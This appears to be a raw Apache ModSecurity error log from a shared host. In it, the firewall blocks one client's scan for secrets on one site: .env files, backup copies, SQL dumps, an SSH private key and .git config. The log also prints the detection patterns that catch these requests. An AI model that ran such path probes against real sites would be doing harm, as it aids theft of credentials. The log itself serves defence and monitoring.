[Tue May 26 19:55:21.307298 2026] [security2:error] [pid 93868:tid 94345] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtT0qK9k_ZUB2Vp25T0wAAAeY"]
[Tue May 26 19:55:21.315274 2026] [security2:error] [pid 93576:tid 93712] [client 185.177.72.53:42764] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/connection.php.copy"] [unique_id "ahWtUWDRMqfxdEDkoszanwAAAAA"]
[Tue May 26 19:55:21.316201 2026] [security2:error] [pid 93576:tid 93732] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtUGDRMqfxdEDkoszaigAAABQ"]
[Tue May 26 19:55:21.320926 2026] [security2:error] [pid 93576:tid 93821] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtT2DRMqfxdEDkoszadAAAAG0"]
[Tue May 26 19:55:21.321473 2026] [security2:error] [pid 93868:tid 94329] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtUEqK9k_ZUB2Vp25UBgAAAdY"]
[Tue May 26 19:55:21.330133 2026] [security2:error] [pid 93868:tid 94380] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtUEqK9k_ZUB2Vp25UBwAAAgk"]
[Tue May 26 19:55:21.333098 2026] [security2:error] [pid 93868:tid 94321] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtT0qK9k_ZUB2Vp25T-AAAAc4"]
[Tue May 26 19:55:21.339860 2026] [security2:error] [pid 93576:tid 93833] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtT2DRMqfxdEDkoszacgAAAHk"]
[Tue May 26 19:55:21.363162 2026] [security2:error] [pid 93576:tid 93736] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtT2DRMqfxdEDkoszaeAAAABg"]
[Tue May 26 19:55:21.929975 2026] [cgid:error] [pid 93868:tid 94360] (32)Broken pipe: [client 127.0.0.1:38286] AH02651: Error writing request body to script /usr/local/cpanel/cgi-sys/autodiscover.cgi
[Tue May 26 19:55:21.995765 2026] [security2:error] [pid 93576:tid 93791] [client 185.177.72.53:42764] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/api/keys/default.sql"] [unique_id "ahWtUWDRMqfxdEDkoszaqgAAAE8"]
[Tue May 26 19:55:22.164159 2026] [security2:error] [pid 93576:tid 93837] [client 185.177.72.53:42764] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/storage/.env.old"] [unique_id "ahWtUmDRMqfxdEDkoszarAAAAH0"]
[Tue May 26 19:55:22.186016 2026] [core:error] [pid 93868:tid 94360] (104)Connection reset by peer: [client 127.0.0.1:38286] AH00574: ap_content_length_filter: apr_bucket_read() failed
[Tue May 26 19:55:22.186264 2026] [proxy_http:error] [pid 93868:tid 94283] (20014)Internal error (specific information not available): [client 45.148.10.16:42646] AH01102: error reading status line from remote server 127.0.0.1:80
[Tue May 26 19:55:22.186287 2026] [proxy:error] [pid 93868:tid 94283] [client 45.148.10.16:42646] AH00898: Error reading from remote server returned by /
[Tue May 26 19:55:22.332002 2026] [security2:error] [pid 93576:tid 93834] [client 185.177.72.53:42764] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/developer/.env"] [unique_id "ahWtUmDRMqfxdEDkoszarwAAAHo"]
[Tue May 26 19:55:22.499774 2026] [security2:error] [pid 93576:tid 93741] [client 185.177.72.53:42764] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/api/.env"] [unique_id "ahWtUmDRMqfxdEDkoszasgAAAB0"]
[Tue May 26 19:55:22.805206 2026] [security2:error] [pid 93576:tid 93776] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWtUmDRMqfxdEDkoszasQAAAEA"]
[Tue May 26 19:55:22.925986 2026] [security2:error] [pid 93576:tid 93774] [client 45.148.10.16:58622] ModSecurity: Access denied with code 406 (phase 1). Pattern match "^POST$" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "187"] [id "900401"] [msg "PHP Spam Botnet"] [hostname "autodiscover.tickerbell.tech"] [uri "/en"] [unique_id "ahWtUmDRMqfxdEDkoszauwAAAD4"]
[Tue May 26 19:55:23.174537 2026] [security2:error] [pid 93576:tid 93789] [client 185.177.72.53:42764] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/mobile-app/backend/.env"] [unique_id "ahWtU2DRMqfxdEDkoszawQAAAE0"]
[Tue May 26 19:55:23.343037 2026] [security2:error] [pid 93576:tid 93782] [client 185.177.72.53:42764] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/oracle.php.old"] [unique_id "ahWtU2DRMqfxdEDkoszawwAAAEY"]
[Tue May 26 19:55:23.994603 2026] [security2:error] [pid 93868:tid 94385] [client 185.177.72.53:5626] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/settings.py.bak"] [unique_id "ahWtU0qK9k_ZUB2Vp25UYgAAAg4"]
[Tue May 26 19:55:24.307992 2026] [security2:error] [pid 93868:tid 94306] [client 185.177.72.53:5626] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/config/private/test.bak"] [unique_id "ahWtVEqK9k_ZUB2Vp25UaQAAAb8"]
[Tue May 26 19:55:24.464168 2026] [security2:error] [pid 93868:tid 94286] [client 185.177.72.53:5626] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/hotfix/.env"] [unique_id "ahWtVEqK9k_ZUB2Vp25UbwAAAas"]
[Tue May 26 19:55:24.778748 2026] [security2:error] [pid 93868:tid 94288] [client 185.177.72.53:5626] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(wp-)?config\\\\.(php\\\\.)?(?:bac?k|o(?:ld|rig)|copy|s(?:ave|wp)|vim?\\\\.|~)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1254"] [id "390597"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup config file (disable this rule if you require access to these backup files)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/config/keys/config.bak"] [unique_id "ahWtVEqK9k_ZUB2Vp25UeAAAAa0"]
[Tue May 26 19:55:24.934186 2026] [security2:error] [pid 93868:tid 94345] [client 185.177.72.53:5626] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/slack-bot/src/.env"] [unique_id "ahWtVEqK9k_ZUB2Vp25UfwAAAeY"]
[Tue May 26 19:55:25.497637 2026] [security2:error] [pid 93868:tid 94377] [client 47.128.40.53:18164] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "newdental.com.co"] [uri "/robots.txt"] [unique_id "ahWtVUqK9k_ZUB2Vp25UlAAAAgY"]
[Tue May 26 19:55:25.526309 2026] [security2:error] [pid 93868:tid 94344] [client 114.119.139.220:56027] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.cagmedya.com"] [uri "/ankara-web-tasarim/"] [unique_id "ahWtVUqK9k_ZUB2Vp25UlQAAAeU"], referer: https://trickyairbedshocks.com/s/cdn/?cagmedya.com
[Tue May 26 19:55:25.719323 2026] [security2:error] [pid 93868:tid 94330] [client 185.177.72.53:5626] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/price_hawk_client/.env"] [unique_id "ahWtVUqK9k_ZUB2Vp25UmQAAAdc"]
[Tue May 26 19:55:25.924816 2026] [security2:error] [pid 93868:tid 94384] [client 57.141.2.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWtVUqK9k_ZUB2Vp25UkgAAAg0"]
[Tue May 26 19:55:26.033167 2026] [security2:error] [pid 93868:tid 94276] [client 185.177.72.53:5626] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/class.php.copy"] [unique_id "ahWtVkqK9k_ZUB2Vp25UpwAAAaE"]
[Tue May 26 19:55:27.455213 2026] [security2:error] [pid 93868:tid 94304] [client 185.177.72.53:5626] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/config/old/index.bak"] [unique_id "ahWtV0qK9k_ZUB2Vp25UzwAAAb0"]
[Tue May 26 19:55:28.084610 2026] [security2:error] [pid 93868:tid 94295] [client 185.177.72.53:5626] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/connect.php.copy"] [unique_id "ahWtWEqK9k_ZUB2Vp25U4gAAAbQ"]
[Tue May 26 19:55:28.240951 2026] [security2:error] [pid 93868:tid 94266] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWtV0qK9k_ZUB2Vp25U2gAAAZc"]
[Tue May 26 19:55:28.459177 2026] [security2:error] [pid 93868:tid 94370] [client 152.42.213.139:57550] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 139.213.42.152.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/wp-login.php"] [unique_id "ahWtWEqK9k_ZUB2Vp25U7QAAAf8"]
[Tue May 26 19:55:28.555556 2026] [security2:error] [pid 93868:tid 94315] [client 185.177.72.53:5626] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/asset_img/.env"] [unique_id "ahWtWEqK9k_ZUB2Vp25U8AAAAcg"]
[Tue May 26 19:55:28.713774 2026] [security2:error] [pid 93868:tid 94363] [client 185.177.72.53:5626] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/fitness-app/server/.env"] [unique_id "ahWtWEqK9k_ZUB2Vp25U9wAAAfg"]
[Tue May 26 19:55:28.870009 2026] [security2:error] [pid 93868:tid 94379] [client 185.177.72.53:5626] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/mongodb/.env"] [unique_id "ahWtWEqK9k_ZUB2Vp25U-gAAAgg"]
[Tue May 26 19:55:28.878642 2026] [security2:error] [pid 93576:tid 93798] [client 79.140.117.196:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWtWGDRMqfxdEDkosza5QAAAFY"]
[Tue May 26 19:55:29.811413 2026] [security2:error] [pid 93868:tid 94358] [client 185.177.72.53:5626] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/urlmem-app/.env"] [unique_id "ahWtWUqK9k_ZUB2Vp25VFgAAAfM"]
[Tue May 26 19:55:30.284215 2026] [security2:error] [pid 93868:tid 94385] [client 185.177.72.53:5626] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:id_(?:r|d)sa$|key\\\\.pem$|(?:myserver|private-?key)\\\\.key$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1291"] [id "350591"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw Private cryto keys"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/.ssh/id_rsa"] [unique_id "ahWtWkqK9k_ZUB2Vp25VJwAAAg4"]
[Tue May 26 19:55:30.440162 2026] [security2:error] [pid 93868:tid 94361] [client 185.177.72.53:5626] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/ticket/.env"] [unique_id "ahWtWkqK9k_ZUB2Vp25VLgAAAfY"]
[Tue May 26 19:55:30.581303 2026] [security2:error] [pid 93576:tid 93780] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWtWmDRMqfxdEDkosza7gAAAEQ"]
[Tue May 26 19:55:31.543993 2026] [security2:error] [pid 93868:tid 94323] [client 185.177.72.53:5626] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/customer/.env"] [unique_id "ahWtW0qK9k_ZUB2Vp25VSwAAAdA"]
[Tue May 26 19:55:31.700463 2026] [security2:error] [pid 93868:tid 94303] [client 185.177.72.53:5626] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(wp-)?config\\\\.(php\\\\.)?(?:bac?k|o(?:ld|rig)|copy|s(?:ave|wp)|vim?\\\\.|~)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1254"] [id "390597"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup config file (disable this rule if you require access to these backup files)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/.git/config.bak.bak"] [unique_id "ahWtW0qK9k_ZUB2Vp25VUgAAAbw"]
[Tue May 26 19:55:32.485925 2026] [security2:error] [pid 93868:tid 94301] [client 185.177.72.53:5626] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/music-app/client/.env"] [unique_id "ahWtXEqK9k_ZUB2Vp25VYwAAAbo"]
[Tue May 26 19:55:32.641353 2026] [security2:error] [pid 93868:tid 94369] [client 185.177.72.53:5626] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/vendor/aws/.env"] [unique_id "ahWtXEqK9k_ZUB2Vp25VagAAAf4"]
[Tue May 26 19:55:32.959196 2026] [security2:error] [pid 93868:tid 94258] [client 185.177.72.53:5626] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/admin/config/readme.bak"] [unique_id "ahWtXEqK9k_ZUB2Vp25VcQAAAY8"]
[Tue May 26 19:55:33.746962 2026] [security2:error] [pid 93868:tid 94345] [client 185.177.72.53:5626] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/mybot/src/.env"] [unique_id "ahWtXUqK9k_ZUB2Vp25VhQAAAeY"]
[Tue May 26 19:55:33.800167 2026] [security2:error] [pid 93576:tid 93761] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWtXWDRMqfxdEDkoszbCAAAADE"]
[Tue May 26 19:55:33.817804 2026] [security2:error] [pid 93576:tid 93808] [client 65.109.156.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWtXWDRMqfxdEDkoszbFwAAAGA"]
[Tue May 26 19:55:33.817841 2026] [security2:error] [pid 93576:tid 93808] [client 65.109.156.37:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWtXWDRMqfxdEDkoszbFwAAAGA"]
